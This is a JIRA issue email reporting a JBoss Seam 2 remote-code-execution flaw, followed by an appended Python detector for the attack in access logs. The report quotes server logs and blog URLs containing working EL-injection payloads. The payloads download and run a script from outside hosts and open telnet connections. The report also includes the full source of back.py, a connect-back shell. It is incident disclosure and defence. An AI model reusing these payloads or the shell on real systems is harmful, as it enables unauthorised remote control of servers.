<style>
/* Changing the layout to use less space for mobiles */
@media screen and (max-device-width: 480px), screen and (-webkit-min-device-pixel-ratio: 2) {
#email-body { min-width: 30em !important; }
#email-page { padding: 8px !important; }
#email-banner { padding: 8px 8px 0 8px !important; }
#email-avatar { margin: 1px 8px 8px 0 !important; padding: 0 !important; }
#email-fields { padding: 0 8px 8px 8px !important; }
#email-gutter { width: 0 !important; }
}
</style>
<div id="email-body">
<table id="email-wrap" align="center" border="0" cellpadding="0" cellspacing="0" style="background-color:#f0f0f0;color:#000000;width:100%;">
<tr valign="top">
<td id="email-page" style="padding:16px !important;">
<table align="center" border="0" cellpadding="0" cellspacing="0" style="background-color:#ffffff;border:1px solid #bbbbbb;color:#000000;width:100%;">
<tr valign="top">
<td bgcolor="#3b4d64" style="background-color:#3b4d64;color:#ffffff;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;line-height:1;"><img src="https://issues.jboss.org/s/en_US-g3yjjf/733/58/_/jira-logo-scaled.png" alt="" style="vertical-align:top;" /></td>
</tr><tr valign="top">
<td id="email-banner" style="padding:32px 32px 0 32px;">
<table align="left" border="0" cellpadding="0" cellspacing="0" width="100%" style="width:100%;">
<tr valign="top">
<td style="color:#505050;font-family:Arial,FreeSans,Helvetica,sans-serif;padding:0;">
<img id="email-avatar" src="https://community.jboss.org/people/kevineliuk/avatar/16.png" alt="" height="48" width="48" border="0" align="left" style="padding:0;margin: 0 16px 16px 0;" />
<div id="email-action" style="padding: 0 0 8px 0;font-size:12px;line-height:18px;">
<a class="user-hover" rel="kevineliuk" id="email_kevineliuk" href="https://issues.jboss.org/secure/ViewProfile.jspa?name=kevineliuk" style="color:#003366;">Kevin Eliuk</a>
created <img src="https://issues.jboss.org/images/icons/bug.gif" height="16" width="16" border="0" align="absmiddle" alt="Bug"> <a style='color:#003366;text-decoration:none;' href='https://issues.jboss.org/browse/JBSEAM-4994'>JBSEAM-4994</a>
</div>
<div id="email-summary" style="font-size:16px;line-height:20px;padding:2px 0 16px 0;">
<a style='color:#003366;text-decoration:none;' href='https://issues.jboss.org/browse/JBSEAM-4994'><strong>JBoss Seam remote execution vulnerability</strong></a>
</div>
</td>
</tr>
</table>
</td>
</tr>
<tr valign="top">
<td id="email-fields" style="padding:0 32px 32px 32px;">
<table border="0" cellpadding="0" cellspacing="0" style="padding:0;text-align:left;width:100%;" width="100%">
<tr valign="top">
<td id="email-gutter" style="width:64px;white-space:nowrap;"></td>
<td>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Issue Type:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<img src="https://issues.jboss.org/images/icons/bug.gif" height="16" width="16" border="0" align="absmiddle" alt="Bug"> Bug
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Affects Versions:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
2.1.2.GA </td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Assignee:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
Unassigned </td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Components:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
Security </td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Created:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
19/Jun/12 5:55 PM
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Description:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<p style='margin-top:0;margin-bottom:10px;'>Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.</p>
<p style='margin-top:0;margin-bottom:10px;'>I have not found anything to show this has been reported previously. I have not yet reproduced and am working on fully understanding the exploit.</p>
<p style='margin-top:0;margin-bottom:10px;'>== server.log ==<br/>
2012-05-22 13:53:10,198 36426506 INFO [STDOUT] (ajp-0.0.0.0-8009-15) 13:53:10,198 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24<br/>
2012-05-22 13:53:16,595 36432903 INFO [STDOUT] (ajp-0.0.0.0-8009-15) 13:53:16,595 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24</p>
<p style='margin-top:0;margin-bottom:10px;'>== httpd.log with pertinent sections grouped ==<br/>
/*<br/>
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677<br/>
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561<br/>
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224<br/>
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150<br/>
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/extranet.css HTTP/1.1" 200 10799<br/>
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/js/site.js HTTP/1.1" 200 539<br/>
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555<br/>
115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - [22/May/2012:13:53:39 -0700] "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - [22/May/2012:13:53:43 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - [22/May/2012:13:53:44 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - [22/May/2012:13:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>Discovered the following information on some searches</p>
<p style='margin-top:0;margin-bottom:10px;'>== <a href="http://erro.sinaapp.com/?p=47">http://erro.sinaapp.com/?p=47</a> ==</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478">http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478</a></p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6]}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName('java.lang.Runtime')}.getDeclaredMethods()[13]}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py')}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}</p>
<p style='margin-top:0;margin-bottom:10px;'>== back.py ==</p>
<pre style='margin-top:0;margin-bottom:10px;'>#!/usr/bin/python
# Python 2 connect-back shell as posted at the blog above: connects out to
# &lt;conn_back_ip&gt;:&lt;port&gt;, wires the socket to stdin/stdout/stderr and spawns /bin/sh on a pty.
import sys
import os
import socket
import pty

shell = "/bin/sh"

def usage(programname):
    print "Python connect-back door"
    print "Usage: %s &lt;conn_back_ip&gt; &lt;port&gt;" % programname

def main():
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit(1)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((socket.gethostbyname(sys.argv[1]), int(sys.argv[2])))
        print "[+]Connect OK."
    except:
        print "[-]Can't connect"
        sys.exit(2)
    # Point stdin/stdout/stderr at the socket so the shell talks to the remote end
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    global shell
    # Keep the interactive session out of the shell history
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    pty.spawn(shell)
    s.close()

if __name__ == "__main__":
    main()
</pre>
</td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Project:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<a style="color:#003366;" href="https://issues.jboss.org/browse/JBSEAM">Seam 2</a>
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Priority:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<img src="https://issues.jboss.org/images/icons/priority_major.gif" height="16" width="16" border="0" align="absmiddle" alt="Major"> Major
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Reporter:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<a class="user-hover" rel="kevineliuk" id="email_kevineliuk" href="https://issues.jboss.org/secure/ViewProfile.jspa?name=kevineliuk" style="color:#003366;">Kevin Eliuk</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td><!-- End #email-page -->
</tr>
<tr valign="top">
<td style="color:#505050;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:10px;line-height:14px;padding: 0 16px 16px 16px;text-align:center;">
This message is automatically generated by JIRA.<br />
If you think it was sent incorrectly, please contact your <a style='color:#003366;' href='https://issues.jboss.org/secure/ContactAdministrators!default.jspa'>JIRA administrators</a>.<br />
For more information on JIRA, see: <a style='color:#003366;' href='http://www.atlassian.com/software/jira'>http://www.atlassian.com/software/jira</a>
</td>
</tr>
</table><!-- End #email-wrap -->
</div><!-- End #email-body -->
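An added detection example for the access-log pattern in the report above; this is not the reporter's code and not part of Seam. It parses httpd common-log lines, URL-decodes the query string, pulls the brace-balanced #{...} EL expression out of the actionOutcome parameter and reports its last string literal (in the reflective chain shown in the logs that literal is the command handed to Runtime.exec), plus any dotted-quad host in that command as a staging or connect-back indicator. It also flags the follow-up request in which the returned Process object's toString() (java.lang.UNIXProcess@...) is reflected back in the redirect, which is the evidence that the command actually ran. It deliberately keys on "#{" in actionOutcome rather than on the [13]/[6] method indices, because the order returned by getDeclaredMethods() is unspecified and varies between JDK builds. The sample lines are constructed from the report's requests with the redacted application path replaced by a made-up /app prefix; matching ProcessImpl (the Windows JDK Process class) is an assumption, since the report only shows UNIXProcess.

```python
"""Flag Seam 2 actionOutcome EL-injection attempts in httpd access logs.

Added example for the report above; not the reporter's code and not part of Seam.
The sample lines are constructed from the request shapes in the report; the
redacted application path is replaced with the made-up prefix /app.
"""
import re
from urllib.parse import unquote_plus

# Apache common-log prefix: client, ident, user, [timestamp], "request line", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Single-quoted EL string literals, e.g. 'java.lang.Runtime' or the shell command.
STRING_RE = re.compile(r"'([^']*)'")
# Dotted-quad hosts inside a command (staging server, connect-back target).
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# Process object echoed into the redirect. UNIXProcess is what the report shows;
# ProcessImpl (Windows JDKs) is an assumption added here.
PROCESS_RE = re.compile(r'java\.lang\.(?:UNIXProcess|ProcessImpl)@[0-9a-f]+')

# Constructed sample: the reporter's requests with /app standing in for the redacted path,
# plus one benign actionOutcome redirect from an internal client.
SAMPLE_LOG = """\
115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /app/home.seam HTTP/1.1" 200 172555
115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /app/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979
115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979
10.1.2.3 - - [22/May/2012:14:10:02 -0700] "GET /app/home.seam?actionOutcome=/app/welcome.xhtml&cid=1850 HTTP/1.1" 302 -
"""


def query_params(query):
    """Split a raw query string into decoded (key, value) pairs; the first '=' separates them."""
    pairs = []
    for item in query.split('&'):
        if item:
            key, _, value = item.partition('=')
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def extract_el(value):
    """Return the first brace-balanced #{...} expression in a decoded value, or None."""
    start = value.find('#{')
    if start < 0:
        return None
    depth = 0
    for i in range(start + 1, len(value)):
        if value[i] == '{':
            depth += 1
        elif value[i] == '}':
            depth -= 1
            if depth == 0:
                return value[start:i + 1]
    return value[start:]  # unbalanced expression: report it rather than miss it


def analyze(lines):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m['target'].partition('?')
        for key, value in query_params(query):
            if key == 'actionOutcome':
                el = extract_el(value)
                if el is None:
                    continue  # ordinary Seam navigation outcome, not an EL expression
                # In the reflective Runtime.exec chain the last string literal is the command.
                literals = STRING_RE.findall(el)
                command = literals[-1] if literals else ''
                findings.append({'ip': m['ip'], 'ts': m['ts'], 'kind': 'el_injection',
                                 'path': path, 'command': command,
                                 'hosts': IPV4_RE.findall(command)})
            elif PROCESS_RE.search(value):
                # exec() succeeded: the Process object was reflected into the redirect target.
                findings.append({'ip': m['ip'], 'ts': m['ts'], 'kind': 'exec_confirmed',
                                 'path': path, 'command': '', 'hosts': []})
    return findings


def external_hosts(findings):
    """Sorted, de-duplicated hosts named in executed commands (candidate C2/staging IOCs)."""
    return sorted({h for f in findings for h in f['hosts']})


if __name__ == '__main__':
    results = analyze(SAMPLE_LOG.splitlines())
    for f in results:
        print(f['ts'], f['ip'], f['kind'], f['path'], f['command'])
    print('hosts to block/hunt:', external_hosts(results))
```

Run it against a real access log with `analyze(open(path).readlines())`; an `el_injection` finding immediately followed by an `exec_confirmed` from the same client is the sequence the report shows, and the `hosts` field gives the addresses to pivot on in firewall and DNS logs.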